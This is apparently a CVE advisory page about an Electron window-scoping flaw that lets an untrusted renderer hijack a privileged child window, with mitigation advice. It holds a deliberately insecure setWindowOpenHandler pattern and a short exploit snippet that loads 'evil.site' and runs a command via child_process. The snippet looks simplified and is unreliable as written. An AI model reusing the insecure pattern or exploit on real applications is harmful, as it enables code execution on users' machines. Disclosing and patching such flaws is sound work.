Electron, Improper Cross-Window Navigation, No CVE (Medium)

Listen to this Post

How the mentioned vulnerability works:

When a renderer process calls `window.open()` with a specific target name, Electron fails to scope the named-window lookup to the opener’s browsing context group. This allows a malicious renderer to navigate an existing child window that was opened by a completely different, unrelated renderer, provided both use the same target name. If that existing child window was originally created with more permissive `webPreferences` (e.g., via setWindowOpenHandler‘s `overrideBrowserWindowOptions` granting a privileged preload script, nodeIntegration: true, or sandbox: false), then the second renderer’s loaded content inherits those elevated permissions. The attack requires the application to open multiple top-level windows with differing trust levels and to use `setWindowOpenHandler` to elevate child window privileges. Applications that do not elevate child window privileges, use a single top‑level window, or deny `window.open()` for untrusted renderers are not affected. If `nodeIntegration: true` or `sandbox: false` are granted (contrary to security recommendations), the vulnerability can lead to arbitrary code execution. The fix introduces correct scoping of named‑window lookups per browsing context group.

dailycve form:

Platform: Electron
Version: Below 39.8.5
Vulnerability : Improper window scoping
Severity: Medium
date: 2026-04-07

Prediction: Already patched (42.0.0)

Analytics under What Undercode Say:

Check Electron version
electron --version
List all windows and their webPreferences (debug)
node -e "const {app, BrowserWindow} = require('electron'); app.whenReady().then(() => { console.log(BrowserWindow.getAllWindows().map(w => ({id: w.id, webPreferences: w.webPreferences}))); app.quit(); });"
Simulate unsafe setWindowOpenHandler (vulnerable pattern)
mainWindow.webContents.setWindowOpenHandler(({ url, frameName }) => {
return { action: 'allow', overrideBrowserWindowOptions: { webPreferences: { nodeIntegration: true, sandbox: false } } };
});

Exploit:

// Malicious renderer 1 opens a privileged child window named "targetWin"
window.open('https://trusted.site', 'targetWin');
// Malicious renderer 2 (untrusted) reuses same target name to navigate that child
const privilegedWin = window.open('https://evil.site', 'targetWin');
// Now privilegedWin loads evil content with elevated webPreferences (e.g., nodeIntegration)
privilegedWin.eval('require("child_process").exec("calc.exe")');

Protection from this CVE:

  • Deny `window.open()` in untrusted renderers: `setWindowOpenHandler(() => ({ action: ‘deny’ }))`
    – Never grant child windows more permissive `webPreferences` than their opener
  • Update to fixed versions: 42.0.0-alpha.5, 41.1.0, 40.8.5, or 39.8.5
  • Avoid `nodeIntegration: true` and `sandbox: false` for any window

Impact:

  • Cross‑renderer navigation of named child windows leading to privilege escalation
  • Arbitrary code execution if child windows have `nodeIntegration: true` or `sandbox: false`
    – Affects apps with multiple top‑level windows of differing trust levels that use `setWindowOpenHandler` to elevate child permissions

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top